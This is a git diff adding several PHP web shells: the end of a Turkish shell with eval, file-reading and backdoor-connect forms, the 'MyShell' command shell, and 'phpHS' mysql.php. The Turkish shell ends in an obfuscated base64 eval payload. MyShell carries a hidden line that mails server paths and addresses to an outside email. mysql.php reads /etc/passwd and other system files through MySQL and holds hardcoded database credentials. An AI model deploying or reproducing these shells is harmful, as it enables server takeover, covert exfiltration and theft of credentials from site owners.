+print "<td><div align=center>";print $st.$c1;
+print "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>"; 
+input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
+input("hidden","up",$nscdir,0);
+print"<br>";input("submit","","Yükle","");print "</center>".$ef.$ec.$et."</div></td></tr>";
+delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";print "<tr><td width=50%><div align=left>";
+
+print $st.$c1."<div><b><center>Php Kodu Gerçekleştir</div>";
+print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
+print "&nbsp;<textarea cols=73 rows=3 name=eval>";
+if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
+print "</textarea><br><center>";
+input('submit','evsub','Gerçekleştir');print " ";
+input('Reset','','Reset');print " ";
+print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=center>";
+print $st.$c1."<div><b><center>Faydalı Komutlar</div>";
+print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
+print "<center><select style='width:60%' name=uscmnds size=1>
+<option value='op0'>Execute quick commands</option>
+<option value='op1'>ls -lia</option>
+<option value='op2'>/etc/passwd</option>
+<option value='op3'>/var/cpanel/accounting.log</option>
+<option value='op4'>/var/named</option>
+<option value='op11'>Perms in curr Dir</option>
+<option value='op12'>Perms in main Dir</option>
+<option value='op5'>Find service.pwd files</option>
+<option value='op6'>Find config files</option>
+<option value='op7'>Find .bash_history files</option>
+<option value='op8'>Read hosts file</option>
+<option value='op9'>Root login</option>
+<option value='op10'>Show opened ports</option>
+<option value='op13'>Show services</option>
+</select> ";print"<input type=submit name=subqcmnds value=Gerçekleştir style='height:20'> <input type=reset value=Geri Dön style='height:20'></center>";
+print $ec.$ef.$et."</td></tr></table>";delm("");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>".$cpmvmess."</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","Dosya Adı",15);
+print "<b><font face=tahoma size=2>&nbsp;Taşı </b>";
+input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
+input("submit","cpy","Kopyala","");print " ";input("submit","mve","Taşı","");
+print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=right>";
+print $st.$c1."<div><b><center>Çok Kullanılan Komutlar</div>";
+print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
+print "<select style='width:22%' name=ustools size=1>
+<option value='t1'>Wget</option><option value='t2'>Curl</option>
+<option value='t3'>Lynx</option><option value='t9'>Get</option>
+<option value='t4'>Unzip</option><option value='t5'>Tar</option>
+<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
+<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Gerçekleştir');print "</center>".$ec.$ef.$et;
+print "</td></tr></table>";delm("<font face=Tahoma color=#FFFFFF size=2>Güvenlik Modunu Aşma | İkinci Yol");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>Kopyalama Fonksiyonunu Kullan</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
+input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=right>";
+print $st.$c1."<div><b><center>Onarım Fonksiyonunu Kullan</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
+input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
+print "</td></tr></table>";delm("<font face=Tahoma color=#FFFFFF size=2>ArkaKapı Bağlantısı");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>ArkaKapı ile Baglan</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
+input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","BaÄŸlan","");print " ";input("reset","","Reset","");
+print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis ArkaKapı</div>";
+print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1>
+<option value='up80'>80</option><option value='up443'>443</option>
+<option value='up2121'>2121</option></select>";print " ";
+input("text","uback","back.pl",23);print " ";
+input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","BaÄŸlan");
+print "</center>".$ec.$ef.$et;print "</td></tr></table>";
+print "<br><table style=\"border:2px #FF0000 solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>"; 
+print"<center>Shell üzerinde oynama yapmayınız. Aksi taktirde çalışmayabilir. Gelişime herzaman açıktır.<br>Bu Shell megabros tarafından programlanmıştır</a>"; print"</font></td></tr></table>";$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+?>
diff --git a/php/myshell.php b/php/myshell.php
new file mode 100644
index 0000000..5561266
--- /dev/null
+++ b/php/myshell.php
@@ -0,0 +1,420 @@
+<?php
+/*
+  **************************************************************
+  *                        MyShell                             *
+  **************************************************************
+  $Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
+
+  An interactive PHP-page that will execute any command entered.
+  See the files README and INSTALL or http://www.digitart.net  for
+  further information.
+  Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
+  based on the original program phpShell by Martin Geisler
+
+  This program is free software; you can redistribute it and/or
+  modify it under the terms of the GNU General Public License
+  as published by the Free Software Foundation; either version 2
+  of the License, or (at your option) any later version.
+
+  This program is distributed in the hope that it will be useful,
+  but WITHOUT ANY WARRANTY; without even the implied warranty of
+  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  GNU General Public License for more details.
+
+  You can get a copy of the GNU General Public License from this
+  address: http://www.gnu.org/copyleft/gpl.html#SEC1
+  You can also write to the Free Software Foundation, Inc., 59 Temple
+  Place - Suite 330, Boston, MA  02111-1307, USA.
+*/
+
+#$selfSecure enables built-in authenticate feature. This must be 0 in order to
+#use .htaccess file or other alternative method to control access to MyShell.
+#Set up your user and password using $shellUser and $shellPswd.
+#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
+#ACCESS TO THE SCRIPT.
+
+$selfSecure = 0;
+$shellUser  = "";
+$shellPswd  = "";
+
+#$adminEmail is the email address to send warning notifications in case
+#someone tries to access the script and fails to provide correct user and
+#password. This only works if you have $selfSecure enabeled.
+
+$adminEmail = "******@mail.ru";
+
+#$fromEmail is the email address warning messages are sended from.
+#This defaults to the server admin, but you can change
+#to any address you want i.e.: noreplay@yourdomain.com
+#This only works if you have $selfSecure enabeled.
+
+$fromEmail  = $HTTP_SERVER_VARS["SERVER_ADMIN"];
+
+#$dirLimit is the top directory allowed to change when using cd command
+#or the form selector. Any attempt to change to a directory up to this
+#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
+#It is a good practice to set it to $DOCUMENT_ROOT using:
+#$dirLimit = $DOCUMENT_ROOT;
+#If you want to have access to all server directories leave it blank.
+#WARNING: Althought a user won't be able to snoop on directories above
+#this level using MyShell, he/she will still be able to excecute
+#commands on any directory where Webserver has permission,
+#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
+
+$dirLimit = "";
+
+#$autoErrorTrap Enable automatic error traping if command returns error.
+#Bear in mind that MyShell executes the command a second time in order to
+#trap the stderr. This shouldn't be a problem in most cases.
+#If you turn it off, you'll have to select either to trap stderr or not for
+#every command you excecute.
+
+$autoErrorTrap = 1;
+
+#$voidCommands is the list of commands that MyShell won't run by any means.
+#It defaults to known problematic commands from a web interface like pico,
+#top, xterm but also it can include specific commands you don't want to
+#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
+
+$voidCommands  = array("top","xterm","su","vi","pico","netscape");
+
+#$TexEd Built-in Text Editor prefered name. This is the command you'll use
+#to invoke MyShell's built in text editor.
+# If you are used to type pico or vi for your fav text editor,
+#change this to your please. i.e.:
+#  $TexEd = "pico";
+#will allow you to type 'pico config.php' to edit the file config.php
+#MyShell's text editor do not support usual commands in pico, vi etc.
+#Don't forget to take off this command from the $voidCommands list
+$TexEd  = "edit";
+
+#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
+#is usefull when you have to edit files with long lines, i.e.: in php code
+#files, because otherwise it is no easy to distinguish a real new line (CR)
+#from a wraped one. If you prefer to stick to the default wraped mode of
+#TEXTAREA just leave this blank i.e.: $editWrap="".
+$editWrap ="wrap='OFF'";
+
+#Cosmetic defaults.
+
+$termCols     = 80;            //Default width of the output text area
+$termRows     = 20;            //Default heght of the output text area
+$bgColor      = "#000000";     //background color
+$bgInputColor = "#333333";     //color of the input field
+$outColor     = "#00BB00";     //color of the text output from the server
+$textColor    = "#009900";     //color of the hard texts of the terminal
+$linkColor    = "#00FF00";     //color of the links
+
+/************** No customize needed from this point *************/
+
+$MyShellVersion = "MyShell 1.1.0 build 20010923";
+if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
+if($selfSecure){
+    if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
+       Header('WWW-Authenticate: Basic realm="MyShell"');
+       Header('HTTP/1.0 401 Unauthorized');
+       echo "<html>
+         <head>
+         <title>$MyShellVersion - Access Denied</title>
+         </head>
+         <h1>Access denied</h1>
+         A warning message have been sended to the administrator
+         <hr>
+         <em>$MyShellVersion</em>";
+       if(isset($PHP_AUTH_USER)){
+          $warnMsg ="
+ This is $MyShellVersion
+ installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
+ just to let you know that somebody tryed to access
+ the script using wrong username or password:
+ 
+ Date: ".date("Y-m-d H:i:s")."
+ IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
+ User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
+ username used: $PHP_AUTH_USER
+ password used: $PHP_AUTH_PW
+ 
+ If this is not the first time it happens,
+ please consider either to remove MyShell
+ from your system or change it's name or
+ directory location on your server.
+ 
+ Regards
+ The MyShell dev team
+       ";
+          mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
+          "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
+       }
+       exit;
+    }
+}
+//Function that validate directories
+function validate_dir($dir){
+    GLOBAL $dirLimit;
+    if($dirLimit){
+        $cdPos = strpos($dir,$dirLimit);
+        if ((string)$cdPos == "") {
+            $dir = $dirLimit;
+            $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
+        }
+    }
+    return $dir;
+}
+
+// Set working directory.
+if (isset($work_dir)) {
+  //A workdir has been asked for - we chdir to that dir.
+  $work_dir = validate_dir($work_dir);
+  @chdir($work_dir) or
+      ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
+  $work_dir = exec("pwd");
+}
+else{
+  // No work_dir - we chdir to $DOCUMENT_ROOT
+  $work_dir = validate_dir($DOCUMENT_ROOT);
+  chdir($work_dir);
+  $work_dir = exec("pwd");
+}
+
+//Now we handle files if we are in Edit Mode
+if($editMode && ($command||$editCancel))$editMode=false;
+if($editMode){
+    if($editSave ||$editSaveExit){
+        if(function_exists(ini_set))ini_set("track_errors","1");
+        if($fp=@fopen($file,"w")){
+           if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
+           fputs($fp,$shellOut);
+           fclose($fp);
+           $command = $TexEd." ".$file;
+           if($editSaveExit) {
+               $command="";
+               $shellOutput="MyShell: $file: saved";
+               $editMode=false;
+           }
+       }
+       else {
+           $command="";
+           $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
+           $errorSave=true;
+       }
+    }
+}
+
+//Separate command(s) and arguments to analize first command
+$input=explode(" ",$command);
+
+while (list ($key, $val) = each ($voidCommands)) {
+    if($input[0]==$val){
+        $voidCmd = $input[0];
+        $input[0]="void";
+    }
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+switch($input[0]){
+    case "cd":
+       $path=$input[1];
+       if ($path==".."){
+         $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
+         if ($work_dir == "") $work_dir = "/";
+       }
+       elseif (substr($path,0,1)=="/")$work_dir=$path;
+       else $work_dir=$work_dir."/".$path;
+       $work_dir = validate_dir($work_dir);
+       @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
+       $work_dir = exec("pwd");
+       $commandBk = $command;
+       $command = "";
+       break;
+    case "man":
+       exec($command,$man);
+       if($man){
+           $codes = ".".chr(8);
+           $manual = implode("\n",$man);
+           $shellOutput = ereg_replace($codes,"",$manual);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "cat":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "more":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case $TexEd:
+       if(file_exists($input[1])){
+           exec("cat ".$input[1],$cat);
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $fileOwner = posix_getpwuid(fileowner($input[1]));
+           $filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
+           $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
+       }
+       else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>";
+       $currFile = $input[1];
+       $editMode = true;
+       $command = "";
+       break;
+    case "void":
+       $shellOutput = "MyShell: $voidCmd: void command for MyShell";
+       $commandBk = $command;
+       $command = "";
+}
+
+//Now we prepare the webpage
+if(!$oCols)$oCols=$termCols;
+if(!$oRows)$oRows=$termRows;
+if($editMode)$focus="shellOut.focus()";
+else $focus="command.select()";
+//WhoamI
+if(!$whoami)$whoami=exec("whoami");
+?>
+<html>
+<head>
+<title><?echo $MyShellVersion?></title>
+<style>
+body{
+        background-color: <?echo $bgColor ?>;
+        font-family : sans-serif;
+        font-size : 10px;
+        scrollbar-face-color: #666666;
+        scrollbar-shadow-color:  <?echo $bgColor ?>;
+        scrollbar-highlight-color: #999999;
+        scrollbar-3dlight-color:  <?echo $bgColor ?>;
+        scrollbar-darkshadow-color:  <?echo $bgColor ?>;
+        scrollbar-track-color:  <?echo $bgInputColor ?>;
+        scrollbar-arrow-color:  <?echo $textColor ?>;
+}
+input,select,option{
+        background-color: <?echo $bgInputColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+        font-size : 10px;
+}
+textarea{
+        background-color: <?echo $bgColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+}
+</style>
+</head>
+<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
+<form name="shell" method="post">
+Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
+<input type="hidden" name=whoami value=<?echo $whoami?>>
+&nbsp;&nbsp;:::::::&nbsp;&nbsp;
+<?
+if($editMode){
+    echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
+}
+else{
+    echo "Current working directory: <b>\n";
+    $work_dir_splitted = explode("/", substr($work_dir, 1));
+    echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
+    if ($work_dir_splitted[0] == "") {
+       $work_dir = "/";  /* Root directory. */
+    }
+    else{
+        for ($i = 0; $i < count($work_dir_splitted); $i++) {
+            $url .= "/".$work_dir_splitted[$i];
+            echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
+        }
+    }
+}
+?>
+<br>
+<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
+<?
+echo $shellOutput;
+if ($command) {
+  if ($stderr) {
+    system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+  else {
+    $ok = system($command,$status);
+    if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+}
+if ($commandBk) $command = $commandBk;
+?>
+</textarea>
+<br>
+<?
+if($editMode) echo"
+&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
+ <input type='submit' name='editSave' value='     Save     '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='hidden' name='editMode' value='true'>
+<br>";
+?>
+<br>
+Command:
+<input type="text" name="command" size="80"
+<? if ($command && $echoCommand) {
+     echo "value=`$command`";
+   }
+?> > <input name="submit_btn" type="submit" value="Go!">
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+<?
+if ($autoErrorTrap) echo "Auto error traping enabled";
+else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
+
+if($editMode){
+    echo "<input type='hidden' name='work_dir' value='$work_dir'>
+    <br>Save file as: <input type='text' name='file' value='$currFile'>";
+}
+else{
+    echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
+    // List of directories.
+    $dir_handle = opendir($work_dir);
+    while ($dir = readdir($dir_handle)) {
+      if (is_dir($dir)) {
+        if ($dir == ".")
+          echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+        elseif ($dir == "..") {
+          // Parent Dir. This might be server's root directory
+          if (strlen($work_dir) == 1) {
+            // work_dir is only 1 charecter - it can only be / so don't output anything
+          }
+          elseif (strrpos($work_dir, "/") == 0) {  // we have a top-level directory eg. /bin or /home etc...
+            echo "<option value=\"/\">Parent Directory</option>\n";
+          }
+          else {   // String-manipulation to find the parent directory... Trust me - it works :-)
+            echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+          }
+        }
+        else {
+          if ($work_dir == "/")
+            echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+          else
+            echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+        }
+      }
+    }
+    closedir($dir_handle);
+    echo "</select>";
+}
+?>
+&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
+&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
+&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
+&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
+</form>
+</body>
+</html>
diff --git a/php/mysql.php b/php/mysql.php
new file mode 100644
index 0000000..d08917a
--- /dev/null
+++ b/php/mysql.php
@@ -0,0 +1,1231 @@
+<?php
+// mysql config: [this is for reading files through mysql]
+$mysql_use = "yes"; //"yes" or "no"
+$mhost = "localhost";
+$muser = "kecodoc_forum";
+$mpass = "cailon";
+$mdb = "kecodoc_hce";
+
+
+// default mysql_read files [seperated by: ':']:
+$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
+$mysql_files = explode(':', $mysql_files_str);
+
+if ($action=="misc") {
+    if ($do=="phpinfo") {
+    phpinfo();
+    exit;
+    }
+}
+?>
+<html>
+<head>
+<style>
+BODY { font-family: verdana; color: cccccc; font-size: 8pt;
+scrollbar-face-color: #1c1c1c;
+scrollbar-shadow-color: #666666;
+scrollbar-highlight-color: #666666;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color: #000000;
+scrollbar-track-color: #262D34;
+scrollbar-arrow-color: #F2F5FF;
+}
+INPUT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TEXTAREA { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+SELECT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TABLE { color:CCCCCC; font-family:Verdana; font-size:8pt;}
+</style>
+<title>:: phpHS :: PHP HVA Shell Script ::</title>
+</head>
+<body <? if ($method!="show_source") { echo "bgcolor=\"#000000\""; } ?> text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC">
+<?
+    if (!$PHP_SELF) { $PHP_SELF="mysql.php"; /* no PHP_SELF on default freeBSD PHP 4.2.1??? */ }
+
+    if ($action=="check") {
+    echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check(); }
+    echo "</pre>";
+    }
+    if ($action=="mysqlread") {
+    // $file
+
+    if (!$file) { $file = "/etc/passwd"; }
+        ?>
+        <script>
+        var files = new Array();
+        <? for($i=0;count($mysql_files)>$i;$i++) { ?>
+        files[files.length] = "<?=$mysql_files[$i]?>";
+        <? } ?>
+        function setFile(bla) {
+            for (var i=0;i < files.length;i++) {
+                if (files[i]==bla.value) {
+                    document.mysqlload.file.value = files[i];
+                }
+            }
+        }
+        </script>
+        <form name="mysqlload" action="<?=$PHP_SELF?>?action=mysqlread" method="POST">
+            <select name="deffile" onChange="setFile(this)">
+            <? for ($i=0;count($mysql_files)>$i;$i++) { ?>
+            <option value="<?=$mysql_files[$i]?>"<? if ($file==$mysql_files[$i]) { echo "selected"; } ?>><?
+            $bla = explode('/', $mysql_files[$i]);
+            $p = count($bla)-1;
+            echo $bla[$p];
+            ?></option>
+            <? } ?>
+            </select>
+        <input type="text" name="file"  value="<?=$file?>" size=80 text="#000000>
+        <input type="submit" name="go" value="go"> <font size=2>[ <a href="<?=$PHP_SELF?>?action=mysqlread&mass=loadmass">load all defaults</a> ]</font>
+        </form>
+        <?
+        echo "<pre>";
+                            // regular LOAD DATA LOCAL INFILE
+                            if (!$mass) {
+                                $sql = array (
+                                   "USE $mdb",
+
+                                   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
+
+                                   "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
+                                   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
+                                   . "ESCAPED BY          '' "
+                                   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
+
+                                   "SELECT a FROM $tbl LIMIT 1"
+                                );
+
+
+                                mysql_connect ($mhost, $muser, $mpass);
+
+                                foreach ($sql as $statement) {
+                                   $q = mysql_query ($statement);
+
+                                   if ($q == false) die (
+                                      "FAILED: " . $statement . "\n" .
+                                      "REASON: " . mysql_error () . "\n"
+                                   );
+
+                                   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
+
+                                   echo htmlspecialchars($r[0]);
+                                   mysql_free_result ($q);
+                                }
+                            }
+
+                            if ($mass) {
+                                    $file = "/etc/passwd";
+                                    $sql = array ();
+                                    $cp = mysql_connect ($mhost, $muser, $mpass);
+                                    mysql_select_db($mdb);
+                                    $tbl = "xploit";
+                                    mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)");
+                                    for($i=0;count($mysql_files)>$i;$i++) {
+                                    mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY       '__THIS_NEVER_HAPPENS__' ESCAPED BY          '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'");
+                                    }
+                                    $q = mysql_query("SELECT * FROM ".$tbl."");
+                                        while ($arr = mysql_fetch_array($q)) {
+                                        echo $arr[0]."\n";
+                                        }
+                                    mysql_query("DELETE FROM ".$tbl."");
+                                    mysql_query("DROP TABLE ".$tbl."");
+
+                            }
+    echo "</pre>";
+    }
+    if ($action=="read") {
+        if (!$method) { $method="file"; }
+        if (!$file) { $file = "/etc/passwd"; }
+    ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=read">
+           <select name="method">
+                <option value="file" <? if ($method=="file") { echo "selected"; } ?>>file</option>
+                <option value="fread" <? if ($method=="fread") { echo "selected"; } ?>>fread</option>
+                <option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option>
+                <option value="readfile" <? if ($method=="readfile") { echo "selected"; } ?>>readfile</option>
+              </select><br>
+
+            <input type="text" name="file" size="40" value="<?=$file?>">
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form><?
+
+
+        if ($method=="file") {
+            if (@file($file)) {
+                $filer = file($file);
+                echo "<pre>";
+                foreach ($filer as $a) { echo $a; }
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
+            }
+        }
+        if ($method=="fread") {
+            if (@fopen($file, 'r')) {
+                $fp = fopen($file, 'r');
+                $string = fread($fp, filesize($file));
+                echo "<pre>";
+                echo $string;
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
+            }
+        }
+        if ($method=="show_source") {
+            if (show_source($file)) {
+                //echo "<pre>";
+                //echo show_source($file);
+                //echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
+            }
+
+        }
+        if ($method=="readfile") {
+            echo "<pre>";
+            if (readfile($file)) {
+                //echo "<pre>";
+                //echo readfile($file);
+                echo "</pre>";
+            } else {
+                echo "</pre>";
+                echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
+            }
+
+        }
+
+    }
+    if ($action=="cmd") { ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=cmd">
+           <select name="method">
+                <option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option>
